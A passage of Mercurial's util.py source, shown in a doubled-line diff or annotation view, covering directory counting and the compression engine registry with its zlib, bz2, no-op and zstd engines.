3174 for f, s in map.iteritems():
3174 for f, s in map.iteritems():
3175 if s[0] != skip:
3175 if s[0] != skip:
3176 addpath(f)
3176 addpath(f)
3177 else:
3177 else:
3178 for f in map:
3178 for f in map:
3179 addpath(f)
3179 addpath(f)
3180
3180
3181 def addpath(self, path):
3181 def addpath(self, path):
3182 dirs = self._dirs
3182 dirs = self._dirs
3183 for base in finddirs(path):
3183 for base in finddirs(path):
3184 if base in dirs:
3184 if base in dirs:
3185 dirs[base] += 1
3185 dirs[base] += 1
3186 return
3186 return
3187 dirs[base] = 1
3187 dirs[base] = 1
3188
3188
3189 def delpath(self, path):
3189 def delpath(self, path):
3190 dirs = self._dirs
3190 dirs = self._dirs
3191 for base in finddirs(path):
3191 for base in finddirs(path):
3192 if dirs[base] > 1:
3192 if dirs[base] > 1:
3193 dirs[base] -= 1
3193 dirs[base] -= 1
3194 return
3194 return
3195 del dirs[base]
3195 del dirs[base]
3196
3196
3197 def __iter__(self):
3197 def __iter__(self):
3198 return iter(self._dirs)
3198 return iter(self._dirs)
3199
3199
3200 def __contains__(self, d):
3200 def __contains__(self, d):
3201 return d in self._dirs
3201 return d in self._dirs
3202
3202
3203 if safehasattr(parsers, 'dirs'):
3203 if safehasattr(parsers, 'dirs'):
3204 dirs = parsers.dirs
3204 dirs = parsers.dirs
3205
3205
3206 def finddirs(path):
3206 def finddirs(path):
3207 pos = path.rfind('/')
3207 pos = path.rfind('/')
3208 while pos != -1:
3208 while pos != -1:
3209 yield path[:pos]
3209 yield path[:pos]
3210 pos = path.rfind('/', 0, pos)
3210 pos = path.rfind('/', 0, pos)
3211
3211
3212 # compression code
3212 # compression code
3213
3213
3214 SERVERROLE = 'server'
3214 SERVERROLE = 'server'
3215 CLIENTROLE = 'client'
3215 CLIENTROLE = 'client'
3216
3216
3217 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3217 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3218 (u'name', u'serverpriority',
3218 (u'name', u'serverpriority',
3219 u'clientpriority'))
3219 u'clientpriority'))
3220
3220
3221 class compressormanager(object):
3221 class compressormanager(object):
3222 """Holds registrations of various compression engines.
3222 """Holds registrations of various compression engines.
3223
3223
3224 This class essentially abstracts the differences between compression
3224 This class essentially abstracts the differences between compression
3225 engines to allow new compression formats to be added easily, possibly from
3225 engines to allow new compression formats to be added easily, possibly from
3226 extensions.
3226 extensions.
3227
3227
3228 Compressors are registered against the global instance by calling its
3228 Compressors are registered against the global instance by calling its
3229 ``register()`` method.
3229 ``register()`` method.
3230 """
3230 """
3231 def __init__(self):
3231 def __init__(self):
3232 self._engines = {}
3232 self._engines = {}
3233 # Bundle spec human name to engine name.
3233 # Bundle spec human name to engine name.
3234 self._bundlenames = {}
3234 self._bundlenames = {}
3235 # Internal bundle identifier to engine name.
3235 # Internal bundle identifier to engine name.
3236 self._bundletypes = {}
3236 self._bundletypes = {}
3237 # Revlog header to engine name.
3237 # Revlog header to engine name.
3238 self._revlogheaders = {}
3238 self._revlogheaders = {}
3239 # Wire proto identifier to engine name.
3239 # Wire proto identifier to engine name.
3240 self._wiretypes = {}
3240 self._wiretypes = {}
3241
3241
3242 def __getitem__(self, key):
3242 def __getitem__(self, key):
3243 return self._engines[key]
3243 return self._engines[key]
3244
3244
3245 def __contains__(self, key):
3245 def __contains__(self, key):
3246 return key in self._engines
3246 return key in self._engines
3247
3247
3248 def __iter__(self):
3248 def __iter__(self):
3249 return iter(self._engines.keys())
3249 return iter(self._engines.keys())
3250
3250
3251 def register(self, engine):
3251 def register(self, engine):
3252 """Register a compression engine with the manager.
3252 """Register a compression engine with the manager.
3253
3253
3254 The argument must be a ``compressionengine`` instance.
3254 The argument must be a ``compressionengine`` instance.
3255 """
3255 """
3256 if not isinstance(engine, compressionengine):
3256 if not isinstance(engine, compressionengine):
3257 raise ValueError(_('argument must be a compressionengine'))
3257 raise ValueError(_('argument must be a compressionengine'))
3258
3258
3259 name = engine.name()
3259 name = engine.name()
3260
3260
3261 if name in self._engines:
3261 if name in self._engines:
3262 raise error.Abort(_('compression engine %s already registered') %
3262 raise error.Abort(_('compression engine %s already registered') %
3263 name)
3263 name)
3264
3264
3265 bundleinfo = engine.bundletype()
3265 bundleinfo = engine.bundletype()
3266 if bundleinfo:
3266 if bundleinfo:
3267 bundlename, bundletype = bundleinfo
3267 bundlename, bundletype = bundleinfo
3268
3268
3269 if bundlename in self._bundlenames:
3269 if bundlename in self._bundlenames:
3270 raise error.Abort(_('bundle name %s already registered') %
3270 raise error.Abort(_('bundle name %s already registered') %
3271 bundlename)
3271 bundlename)
3272 if bundletype in self._bundletypes:
3272 if bundletype in self._bundletypes:
3273 raise error.Abort(_('bundle type %s already registered by %s') %
3273 raise error.Abort(_('bundle type %s already registered by %s') %
3274 (bundletype, self._bundletypes[bundletype]))
3274 (bundletype, self._bundletypes[bundletype]))
3275
3275
3276 # No external facing name declared.
3276 # No external facing name declared.
3277 if bundlename:
3277 if bundlename:
3278 self._bundlenames[bundlename] = name
3278 self._bundlenames[bundlename] = name
3279
3279
3280 self._bundletypes[bundletype] = name
3280 self._bundletypes[bundletype] = name
3281
3281
3282 wiresupport = engine.wireprotosupport()
3282 wiresupport = engine.wireprotosupport()
3283 if wiresupport:
3283 if wiresupport:
3284 wiretype = wiresupport.name
3284 wiretype = wiresupport.name
3285 if wiretype in self._wiretypes:
3285 if wiretype in self._wiretypes:
3286 raise error.Abort(_('wire protocol compression %s already '
3286 raise error.Abort(_('wire protocol compression %s already '
3287 'registered by %s') %
3287 'registered by %s') %
3288 (wiretype, self._wiretypes[wiretype]))
3288 (wiretype, self._wiretypes[wiretype]))
3289
3289
3290 self._wiretypes[wiretype] = name
3290 self._wiretypes[wiretype] = name
3291
3291
3292 revlogheader = engine.revlogheader()
3292 revlogheader = engine.revlogheader()
3293 if revlogheader and revlogheader in self._revlogheaders:
3293 if revlogheader and revlogheader in self._revlogheaders:
3294 raise error.Abort(_('revlog header %s already registered by %s') %
3294 raise error.Abort(_('revlog header %s already registered by %s') %
3295 (revlogheader, self._revlogheaders[revlogheader]))
3295 (revlogheader, self._revlogheaders[revlogheader]))
3296
3296
3297 if revlogheader:
3297 if revlogheader:
3298 self._revlogheaders[revlogheader] = name
3298 self._revlogheaders[revlogheader] = name
3299
3299
3300 self._engines[name] = engine
3300 self._engines[name] = engine
3301
3301
3302 @property
3302 @property
3303 def supportedbundlenames(self):
3303 def supportedbundlenames(self):
3304 return set(self._bundlenames.keys())
3304 return set(self._bundlenames.keys())
3305
3305
3306 @property
3306 @property
3307 def supportedbundletypes(self):
3307 def supportedbundletypes(self):
3308 return set(self._bundletypes.keys())
3308 return set(self._bundletypes.keys())
3309
3309
3310 def forbundlename(self, bundlename):
3310 def forbundlename(self, bundlename):
3311 """Obtain a compression engine registered to a bundle name.
3311 """Obtain a compression engine registered to a bundle name.
3312
3312
3313 Will raise KeyError if the bundle type isn't registered.
3313 Will raise KeyError if the bundle type isn't registered.
3314
3314
3315 Will abort if the engine is known but not available.
3315 Will abort if the engine is known but not available.
3316 """
3316 """
3317 engine = self._engines[self._bundlenames[bundlename]]
3317 engine = self._engines[self._bundlenames[bundlename]]
3318 if not engine.available():
3318 if not engine.available():
3319 raise error.Abort(_('compression engine %s could not be loaded') %
3319 raise error.Abort(_('compression engine %s could not be loaded') %
3320 engine.name())
3320 engine.name())
3321 return engine
3321 return engine
3322
3322
3323 def forbundletype(self, bundletype):
3323 def forbundletype(self, bundletype):
3324 """Obtain a compression engine registered to a bundle type.
3324 """Obtain a compression engine registered to a bundle type.
3325
3325
3326 Will raise KeyError if the bundle type isn't registered.
3326 Will raise KeyError if the bundle type isn't registered.
3327
3327
3328 Will abort if the engine is known but not available.
3328 Will abort if the engine is known but not available.
3329 """
3329 """
3330 engine = self._engines[self._bundletypes[bundletype]]
3330 engine = self._engines[self._bundletypes[bundletype]]
3331 if not engine.available():
3331 if not engine.available():
3332 raise error.Abort(_('compression engine %s could not be loaded') %
3332 raise error.Abort(_('compression engine %s could not be loaded') %
3333 engine.name())
3333 engine.name())
3334 return engine
3334 return engine
3335
3335
3336 def supportedwireengines(self, role, onlyavailable=True):
3336 def supportedwireengines(self, role, onlyavailable=True):
3337 """Obtain compression engines that support the wire protocol.
3337 """Obtain compression engines that support the wire protocol.
3338
3338
3339 Returns a list of engines in prioritized order, most desired first.
3339 Returns a list of engines in prioritized order, most desired first.
3340
3340
3341 If ``onlyavailable`` is set, filter out engines that can't be
3341 If ``onlyavailable`` is set, filter out engines that can't be
3342 loaded.
3342 loaded.
3343 """
3343 """
3344 assert role in (SERVERROLE, CLIENTROLE)
3344 assert role in (SERVERROLE, CLIENTROLE)
3345
3345
3346 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3346 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3347
3347
3348 engines = [self._engines[e] for e in self._wiretypes.values()]
3348 engines = [self._engines[e] for e in self._wiretypes.values()]
3349 if onlyavailable:
3349 if onlyavailable:
3350 engines = [e for e in engines if e.available()]
3350 engines = [e for e in engines if e.available()]
3351
3351
3352 def getkey(e):
3352 def getkey(e):
3353 # Sort first by priority, highest first. In case of tie, sort
3353 # Sort first by priority, highest first. In case of tie, sort
3354 # alphabetically. This is arbitrary, but ensures output is
3354 # alphabetically. This is arbitrary, but ensures output is
3355 # stable.
3355 # stable.
3356 w = e.wireprotosupport()
3356 w = e.wireprotosupport()
3357 return -1 * getattr(w, attr), w.name
3357 return -1 * getattr(w, attr), w.name
3358
3358
3359 return list(sorted(engines, key=getkey))
3359 return list(sorted(engines, key=getkey))
3360
3360
3361 def forwiretype(self, wiretype):
3361 def forwiretype(self, wiretype):
3362 engine = self._engines[self._wiretypes[wiretype]]
3362 engine = self._engines[self._wiretypes[wiretype]]
3363 if not engine.available():
3363 if not engine.available():
3364 raise error.Abort(_('compression engine %s could not be loaded') %
3364 raise error.Abort(_('compression engine %s could not be loaded') %
3365 engine.name())
3365 engine.name())
3366 return engine
3366 return engine
3367
3367
3368 def forrevlogheader(self, header):
3368 def forrevlogheader(self, header):
3369 """Obtain a compression engine registered to a revlog header.
3369 """Obtain a compression engine registered to a revlog header.
3370
3370
3371 Will raise KeyError if the revlog header value isn't registered.
3371 Will raise KeyError if the revlog header value isn't registered.
3372 """
3372 """
3373 return self._engines[self._revlogheaders[header]]
3373 return self._engines[self._revlogheaders[header]]
3374
3374
3375 compengines = compressormanager()
3375 compengines = compressormanager()
3376
3376
3377 class compressionengine(object):
3377 class compressionengine(object):
3378 """Base class for compression engines.
3378 """Base class for compression engines.
3379
3379
3380 Compression engines must implement the interface defined by this class.
3380 Compression engines must implement the interface defined by this class.
3381 """
3381 """
3382 def name(self):
3382 def name(self):
3383 """Returns the name of the compression engine.
3383 """Returns the name of the compression engine.
3384
3384
3385 This is the key the engine is registered under.
3385 This is the key the engine is registered under.
3386
3386
3387 This method must be implemented.
3387 This method must be implemented.
3388 """
3388 """
3389 raise NotImplementedError()
3389 raise NotImplementedError()
3390
3390
3391 def available(self):
3391 def available(self):
3392 """Whether the compression engine is available.
3392 """Whether the compression engine is available.
3393
3393
3394 The intent of this method is to allow optional compression engines
3394 The intent of this method is to allow optional compression engines
3395 that may not be available in all installations (such as engines relying
3395 that may not be available in all installations (such as engines relying
3396 on C extensions that may not be present).
3396 on C extensions that may not be present).
3397 """
3397 """
3398 return True
3398 return True
3399
3399
3400 def bundletype(self):
3400 def bundletype(self):
3401 """Describes bundle identifiers for this engine.
3401 """Describes bundle identifiers for this engine.
3402
3402
3403 If this compression engine isn't supported for bundles, returns None.
3403 If this compression engine isn't supported for bundles, returns None.
3404
3404
3405 If this engine can be used for bundles, returns a 2-tuple of strings of
3405 If this engine can be used for bundles, returns a 2-tuple of strings of
3406 the user-facing "bundle spec" compression name and an internal
3406 the user-facing "bundle spec" compression name and an internal
3407 identifier used to denote the compression format within bundles. To
3407 identifier used to denote the compression format within bundles. To
3408 exclude the name from external usage, set the first element to ``None``.
3408 exclude the name from external usage, set the first element to ``None``.
3409
3409
3410 If bundle compression is supported, the class must also implement
3410 If bundle compression is supported, the class must also implement
3411 ``compressstream`` and `decompressorreader``.
3411 ``compressstream`` and `decompressorreader``.
3412
3412
3413 The docstring of this method is used in the help system to tell users
3413 The docstring of this method is used in the help system to tell users
3414 about this engine.
3414 about this engine.
3415 """
3415 """
3416 return None
3416 return None
3417
3417
3418 def wireprotosupport(self):
3418 def wireprotosupport(self):
3419 """Declare support for this compression format on the wire protocol.
3419 """Declare support for this compression format on the wire protocol.
3420
3420
3421 If this compression engine isn't supported for compressing wire
3421 If this compression engine isn't supported for compressing wire
3422 protocol payloads, returns None.
3422 protocol payloads, returns None.
3423
3423
3424 Otherwise, returns ``compenginewireprotosupport`` with the following
3424 Otherwise, returns ``compenginewireprotosupport`` with the following
3425 fields:
3425 fields:
3426
3426
3427 * String format identifier
3427 * String format identifier
3428 * Integer priority for the server
3428 * Integer priority for the server
3429 * Integer priority for the client
3429 * Integer priority for the client
3430
3430
3431 The integer priorities are used to order the advertisement of format
3431 The integer priorities are used to order the advertisement of format
3432 support by server and client. The highest integer is advertised
3432 support by server and client. The highest integer is advertised
3433 first. Integers with non-positive values aren't advertised.
3433 first. Integers with non-positive values aren't advertised.
3434
3434
3435 The priority values are somewhat arbitrary and only used for default
3435 The priority values are somewhat arbitrary and only used for default
3436 ordering. The relative order can be changed via config options.
3436 ordering. The relative order can be changed via config options.
3437
3437
3438 If wire protocol compression is supported, the class must also implement
3438 If wire protocol compression is supported, the class must also implement
3439 ``compressstream`` and ``decompressorreader``.
3439 ``compressstream`` and ``decompressorreader``.
3440 """
3440 """
3441 return None
3441 return None
3442
3442
3443 def revlogheader(self):
3443 def revlogheader(self):
3444 """Header added to revlog chunks that identifies this engine.
3444 """Header added to revlog chunks that identifies this engine.
3445
3445
3446 If this engine can be used to compress revlogs, this method should
3446 If this engine can be used to compress revlogs, this method should
3447 return the bytes used to identify chunks compressed with this engine.
3447 return the bytes used to identify chunks compressed with this engine.
3448 Else, the method should return ``None`` to indicate it does not
3448 Else, the method should return ``None`` to indicate it does not
3449 participate in revlog compression.
3449 participate in revlog compression.
3450 """
3450 """
3451 return None
3451 return None
3452
3452
3453 def compressstream(self, it, opts=None):
3453 def compressstream(self, it, opts=None):
3454 """Compress an iterator of chunks.
3454 """Compress an iterator of chunks.
3455
3455
3456 The method receives an iterator (ideally a generator) of chunks of
3456 The method receives an iterator (ideally a generator) of chunks of
3457 bytes to be compressed. It returns an iterator (ideally a generator)
3457 bytes to be compressed. It returns an iterator (ideally a generator)
3458 of bytes of chunks representing the compressed output.
3458 of bytes of chunks representing the compressed output.
3459
3459
3460 Optionally accepts an argument defining how to perform compression.
3460 Optionally accepts an argument defining how to perform compression.
3461 Each engine treats this argument differently.
3461 Each engine treats this argument differently.
3462 """
3462 """
3463 raise NotImplementedError()
3463 raise NotImplementedError()
3464
3464
3465 def decompressorreader(self, fh):
3465 def decompressorreader(self, fh):
3466 """Perform decompression on a file object.
3466 """Perform decompression on a file object.
3467
3467
3468 Argument is an object with a ``read(size)`` method that returns
3468 Argument is an object with a ``read(size)`` method that returns
3469 compressed data. Return value is an object with a ``read(size)`` that
3469 compressed data. Return value is an object with a ``read(size)`` that
3470 returns uncompressed data.
3470 returns uncompressed data.
3471 """
3471 """
3472 raise NotImplementedError()
3472 raise NotImplementedError()
3473
3473
3474 def revlogcompressor(self, opts=None):
3474 def revlogcompressor(self, opts=None):
3475 """Obtain an object that can be used to compress revlog entries.
3475 """Obtain an object that can be used to compress revlog entries.
3476
3476
3477 The object has a ``compress(data)`` method that compresses binary
3477 The object has a ``compress(data)`` method that compresses binary
3478 data. This method returns compressed binary data or ``None`` if
3478 data. This method returns compressed binary data or ``None`` if
3479 the data could not be compressed (too small, not compressible, etc).
3479 the data could not be compressed (too small, not compressible, etc).
3480 The returned data should have a header uniquely identifying this
3480 The returned data should have a header uniquely identifying this
3481 compression format so decompression can be routed to this engine.
3481 compression format so decompression can be routed to this engine.
3482 This header should be identified by the ``revlogheader()`` return
3482 This header should be identified by the ``revlogheader()`` return
3483 value.
3483 value.
3484
3484
3485 The object has a ``decompress(data)`` method that decompresses
3485 The object has a ``decompress(data)`` method that decompresses
3486 data. The method will only be called if ``data`` begins with
3486 data. The method will only be called if ``data`` begins with
3487 ``revlogheader()``. The method should return the raw, uncompressed
3487 ``revlogheader()``. The method should return the raw, uncompressed
3488 data or raise a ``RevlogError``.
3488 data or raise a ``RevlogError``.
3489
3489
3490 The object is reusable but is not thread safe.
3490 The object is reusable but is not thread safe.
3491 """
3491 """
3492 raise NotImplementedError()
3492 raise NotImplementedError()
3493
3493
3494 class _zlibengine(compressionengine):
3494 class _zlibengine(compressionengine):
3495 def name(self):
3495 def name(self):
3496 return 'zlib'
3496 return 'zlib'
3497
3497
3498 def bundletype(self):
3498 def bundletype(self):
3499 """zlib compression using the DEFLATE algorithm.
3499 """zlib compression using the DEFLATE algorithm.
3500
3500
3501 All Mercurial clients should support this format. The compression
3501 All Mercurial clients should support this format. The compression
3502 algorithm strikes a reasonable balance between compression ratio
3502 algorithm strikes a reasonable balance between compression ratio
3503 and size.
3503 and size.
3504 """
3504 """
3505 return 'gzip', 'GZ'
3505 return 'gzip', 'GZ'
3506
3506
3507 def wireprotosupport(self):
3507 def wireprotosupport(self):
3508 return compewireprotosupport('zlib', 20, 20)
3508 return compewireprotosupport('zlib', 20, 20)
3509
3509
3510 def revlogheader(self):
3510 def revlogheader(self):
3511 return 'x'
3511 return 'x'
3512
3512
3513 def compressstream(self, it, opts=None):
3513 def compressstream(self, it, opts=None):
3514 opts = opts or {}
3514 opts = opts or {}
3515
3515
3516 z = zlib.compressobj(opts.get('level', -1))
3516 z = zlib.compressobj(opts.get('level', -1))
3517 for chunk in it:
3517 for chunk in it:
3518 data = z.compress(chunk)
3518 data = z.compress(chunk)
3519 # Not all calls to compress emit data. It is cheaper to inspect
3519 # Not all calls to compress emit data. It is cheaper to inspect
3520 # here than to feed empty chunks through generator.
3520 # here than to feed empty chunks through generator.
3521 if data:
3521 if data:
3522 yield data
3522 yield data
3523
3523
3524 yield z.flush()
3524 yield z.flush()
3525
3525
3526 def decompressorreader(self, fh):
3526 def decompressorreader(self, fh):
3527 def gen():
3527 def gen():
3528 d = zlib.decompressobj()
3528 d = zlib.decompressobj()
3529 for chunk in filechunkiter(fh):
3529 for chunk in filechunkiter(fh):
3530 while chunk:
3530 while chunk:
3531 # Limit output size to limit memory.
3531 # Limit output size to limit memory.
3532 yield d.decompress(chunk, 2 ** 18)
3532 yield d.decompress(chunk, 2 ** 18)
3533 chunk = d.unconsumed_tail
3533 chunk = d.unconsumed_tail
3534
3534
3535 return chunkbuffer(gen())
3535 return chunkbuffer(gen())
3536
3536
3537 class zlibrevlogcompressor(object):
3537 class zlibrevlogcompressor(object):
3538 def compress(self, data):
3538 def compress(self, data):
3539 insize = len(data)
3539 insize = len(data)
3540 # Caller handles empty input case.
3540 # Caller handles empty input case.
3541 assert insize > 0
3541 assert insize > 0
3542
3542
3543 if insize < 44:
3543 if insize < 44:
3544 return None
3544 return None
3545
3545
3546 elif insize <= 1000000:
3546 elif insize <= 1000000:
3547 compressed = zlib.compress(data)
3547 compressed = zlib.compress(data)
3548 if len(compressed) < insize:
3548 if len(compressed) < insize:
3549 return compressed
3549 return compressed
3550 return None
3550 return None
3551
3551
3552 # zlib makes an internal copy of the input buffer, doubling
3552 # zlib makes an internal copy of the input buffer, doubling
3553 # memory usage for large inputs. So do streaming compression
3553 # memory usage for large inputs. So do streaming compression
3554 # on large inputs.
3554 # on large inputs.
3555 else:
3555 else:
3556 z = zlib.compressobj()
3556 z = zlib.compressobj()
3557 parts = []
3557 parts = []
3558 pos = 0
3558 pos = 0
3559 while pos < insize:
3559 while pos < insize:
3560 pos2 = pos + 2**20
3560 pos2 = pos + 2**20
3561 parts.append(z.compress(data[pos:pos2]))
3561 parts.append(z.compress(data[pos:pos2]))
3562 pos = pos2
3562 pos = pos2
3563 parts.append(z.flush())
3563 parts.append(z.flush())
3564
3564
3565 if sum(map(len, parts)) < insize:
3565 if sum(map(len, parts)) < insize:
3566 return ''.join(parts)
3566 return ''.join(parts)
3567 return None
3567 return None
3568
3568
3569 def decompress(self, data):
3569 def decompress(self, data):
3570 try:
3570 try:
3571 return zlib.decompress(data)
3571 return zlib.decompress(data)
3572 except zlib.error as e:
3572 except zlib.error as e:
3573 raise error.RevlogError(_('revlog decompress error: %s') %
3573 raise error.RevlogError(_('revlog decompress error: %s') %
3574 str(e))
3574 str(e))
3575
3575
3576 def revlogcompressor(self, opts=None):
3576 def revlogcompressor(self, opts=None):
3577 return self.zlibrevlogcompressor()
3577 return self.zlibrevlogcompressor()
3578
3578
3579 compengines.register(_zlibengine())
3579 compengines.register(_zlibengine())
3580
3580
3581 class _bz2engine(compressionengine):
3581 class _bz2engine(compressionengine):
3582 def name(self):
3582 def name(self):
3583 return 'bz2'
3583 return 'bz2'
3584
3584
3585 def bundletype(self):
3585 def bundletype(self):
3586 """An algorithm that produces smaller bundles than ``gzip``.
3586 """An algorithm that produces smaller bundles than ``gzip``.
3587
3587
3588 All Mercurial clients should support this format.
3588 All Mercurial clients should support this format.
3589
3589
3590 This engine will likely produce smaller bundles than ``gzip`` but
3590 This engine will likely produce smaller bundles than ``gzip`` but
3591 will be significantly slower, both during compression and
3591 will be significantly slower, both during compression and
3592 decompression.
3592 decompression.
3593
3593
3594 If available, the ``zstd`` engine can yield similar or better
3594 If available, the ``zstd`` engine can yield similar or better
3595 compression at much higher speeds.
3595 compression at much higher speeds.
3596 """
3596 """
3597 return 'bzip2', 'BZ'
3597 return 'bzip2', 'BZ'
3598
3598
3599 # We declare a protocol name but don't advertise by default because
3599 # We declare a protocol name but don't advertise by default because
3600 # it is slow.
3600 # it is slow.
3601 def wireprotosupport(self):
3601 def wireprotosupport(self):
3602 return compewireprotosupport('bzip2', 0, 0)
3602 return compewireprotosupport('bzip2', 0, 0)
3603
3603
3604 def compressstream(self, it, opts=None):
3604 def compressstream(self, it, opts=None):
3605 opts = opts or {}
3605 opts = opts or {}
3606 z = bz2.BZ2Compressor(opts.get('level', 9))
3606 z = bz2.BZ2Compressor(opts.get('level', 9))
3607 for chunk in it:
3607 for chunk in it:
3608 data = z.compress(chunk)
3608 data = z.compress(chunk)
3609 if data:
3609 if data:
3610 yield data
3610 yield data
3611
3611
3612 yield z.flush()
3612 yield z.flush()
3613
3613
3614 def decompressorreader(self, fh):
3614 def decompressorreader(self, fh):
3615 def gen():
3615 def gen():
3616 d = bz2.BZ2Decompressor()
3616 d = bz2.BZ2Decompressor()
3617 for chunk in filechunkiter(fh):
3617 for chunk in filechunkiter(fh):
3618 yield d.decompress(chunk)
3618 yield d.decompress(chunk)
3619
3619
3620 return chunkbuffer(gen())
3620 return chunkbuffer(gen())
3621
3621
3622 compengines.register(_bz2engine())
3622 compengines.register(_bz2engine())
3623
3623
3624 class _truncatedbz2engine(compressionengine):
3624 class _truncatedbz2engine(compressionengine):
3625 def name(self):
3625 def name(self):
3626 return 'bz2truncated'
3626 return 'bz2truncated'
3627
3627
3628 def bundletype(self):
3628 def bundletype(self):
3629 return None, '_truncatedBZ'
3629 return None, '_truncatedBZ'
3630
3630
3631 # We don't implement compressstream because it is hackily handled elsewhere.
3631 # We don't implement compressstream because it is hackily handled elsewhere.
3632
3632
3633 def decompressorreader(self, fh):
3633 def decompressorreader(self, fh):
3634 def gen():
3634 def gen():
3635 # The input stream doesn't have the 'BZ' header. So add it back.
3635 # The input stream doesn't have the 'BZ' header. So add it back.
3636 d = bz2.BZ2Decompressor()
3636 d = bz2.BZ2Decompressor()
3637 d.decompress('BZ')
3637 d.decompress('BZ')
3638 for chunk in filechunkiter(fh):
3638 for chunk in filechunkiter(fh):
3639 yield d.decompress(chunk)
3639 yield d.decompress(chunk)
3640
3640
3641 return chunkbuffer(gen())
3641 return chunkbuffer(gen())
3642
3642
3643 compengines.register(_truncatedbz2engine())
3643 compengines.register(_truncatedbz2engine())
3644
3644
3645 class _noopengine(compressionengine):
3645 class _noopengine(compressionengine):
3646 def name(self):
3646 def name(self):
3647 return 'none'
3647 return 'none'
3648
3648
3649 def bundletype(self):
3649 def bundletype(self):
3650 """No compression is performed.
3650 """No compression is performed.
3651
3651
3652 Use this compression engine to explicitly disable compression.
3652 Use this compression engine to explicitly disable compression.
3653 """
3653 """
3654 return 'none', 'UN'
3654 return 'none', 'UN'
3655
3655
3656 # Clients always support uncompressed payloads. Servers don't because
3656 # Clients always support uncompressed payloads. Servers don't because
3657 # unless you are on a fast network, uncompressed payloads can easily
3657 # unless you are on a fast network, uncompressed payloads can easily
3658 # saturate your network pipe.
3658 # saturate your network pipe.
3659 def wireprotosupport(self):
3659 def wireprotosupport(self):
3660 return compewireprotosupport('none', 0, 10)
3660 return compewireprotosupport('none', 0, 10)
3661
3661
3662 # We don't implement revlogheader because it is handled specially
3662 # We don't implement revlogheader because it is handled specially
3663 # in the revlog class.
3663 # in the revlog class.
3664
3664
3665 def compressstream(self, it, opts=None):
3665 def compressstream(self, it, opts=None):
3666 return it
3666 return it
3667
3667
3668 def decompressorreader(self, fh):
3668 def decompressorreader(self, fh):
3669 return fh
3669 return fh
3670
3670
3671 class nooprevlogcompressor(object):
3671 class nooprevlogcompressor(object):
3672 def compress(self, data):
3672 def compress(self, data):
3673 return None
3673 return None
3674
3674
3675 def revlogcompressor(self, opts=None):
3675 def revlogcompressor(self, opts=None):
3676 return self.nooprevlogcompressor()
3676 return self.nooprevlogcompressor()
3677
3677
3678 compengines.register(_noopengine())
3678 compengines.register(_noopengine())
3679
3679
3680 class _zstdengine(compressionengine):
3680 class _zstdengine(compressionengine):
3681 def name(self):
3681 def name(self):
3682 return 'zstd'
3682 return 'zstd'
3683
3683
3684 @propertycache
3684 @propertycache
3685 def _module(self):
3685 def _module(self):
3686 # Not all installs have the zstd module available. So defer importing
3686 # Not all installs have the zstd module available. So defer importing
3687 # until first access.
3687 # until first access.
3688 try:
3688 try:
3689 from . import zstd
3689 from . import zstd
3690 # Force delayed import.
3690 # Force delayed import.
3691 zstd.__version__
3691 zstd.__version__
3692 return zstd
3692 return zstd
3693 except ImportError:
3693 except ImportError:
3694 return None
3694 return None
3695
3695
3696 def available(self):
3696 def available(self):
3697 return bool(self._module)
3697 return bool(self._module)
3698
3698
3699 def bundletype(self):
3699 def bundletype(self):
3700 """A modern compression algorithm that is fast and highly flexible.
3700 """A modern compression algorithm that is fast and highly flexible.
3701
3701
3702 Only supported by Mercurial 4.1 and newer clients.
3702 Only supported by Mercurial 4.1 and newer clients.
3703
3703
3704 With the default settings, zstd compression is both faster and yields
3704 With the default settings, zstd compression is both faster and yields
3705 better compression than ``gzip``. It also frequently yields better
3705 better compression than ``gzip``. It also frequently yields better
3706 compression than ``bzip2`` while operating at much higher speeds.
3706 compression than ``bzip2`` while operating at much higher speeds.
3707
3707
3708 If this engine is available and backwards compatibility is not a
3708 If this engine is available and backwards compatibility is not a
3709 concern, it is likely the best available engine.
3709 concern, it is likely the best available engine.
3710 """
3710 """
3711 return 'zstd', 'ZS'
3711 return 'zstd', 'ZS'
3712
3712
3713 def wireprotosupport(self):
3713 def wireprotosupport(self):
3714 return compewireprotosupport('zstd', 50, 50)
3714 return compewireprotosupport('zstd', 50, 50)
3715
3715
3716 def revlogheader(self):
3716 def revlogheader(self):
3717 return '\x28'
3717 return '\x28'
3718
3718
3719 def compressstream(self, it, opts=None):
3719 def compressstream(self, it, opts=None):
3720 opts = opts or {}
3720 opts = opts or {}
3721 # zstd level 3 is almost always significantly faster than zlib
3721 # zstd level 3 is almost always significantly faster than zlib
3722 # while providing no worse compression. It strikes a good balance
3722 # while providing no worse compression. It strikes a good balance
3723 # between speed and compression.
3723 # between speed and compression.
3724 level = opts.get('level', 3)
3724 level = opts.get('level', 3)
3725
3725
3726 zstd = self._module
3726 zstd = self._module
3727 z = zstd.ZstdCompressor(level=level).compressobj()
3727 z = zstd.ZstdCompressor(level=level).compressobj()
3728 for chunk in it:
3728 for chunk in it:
3729 data = z.compress(chunk)
3729 data = z.compress(chunk)
3730 if data:
3730 if data:
3731 yield data
3731 yield data
3732
3732
3733 yield z.flush()
3733 yield z.flush()
3734
3734
3735 def decompressorreader(self, fh):
3735 def decompressorreader(self, fh):
3736 zstd = self._module
3736 zstd = self._module
3737 dctx = zstd.ZstdDecompressor()
3737 dctx = zstd.ZstdDecompressor()
3738 return chunkbuffer(dctx.read_from(fh))
3738 return chunkbuffer(dctx.read_from(fh))
3739
3739
3740 class zstdrevlogcompressor(object):
3740 class zstdrevlogcompressor(object):
3741 def __init__(self, zstd, level=3):
3741 def __init__(self, zstd, level=3):
3742 # Writing the content size adds a few bytes to the output. However,
3742 # Writing the content size adds a few bytes to the output. However,
3743 # it allows decompression to be more optimal since we can
3743 # it allows decompression to be more optimal since we can
3744 # pre-allocate a buffer to hold the result.
3744 # pre-allocate a buffer to hold the result.
3745 self._cctx = zstd.ZstdCompressor(level=level,
3745 self._cctx = zstd.ZstdCompressor(level=level,
3746 write_content_size=True)
3746 write_content_size=True)
3747 self._dctx = zstd.ZstdDecompressor()
3747 self._dctx = zstd.ZstdDecompressor()
3748 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3748 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3749 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3749 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3750
3750
3751 def compress(self, data):
3751 def compress(self, data):
3752 insize = len(data)
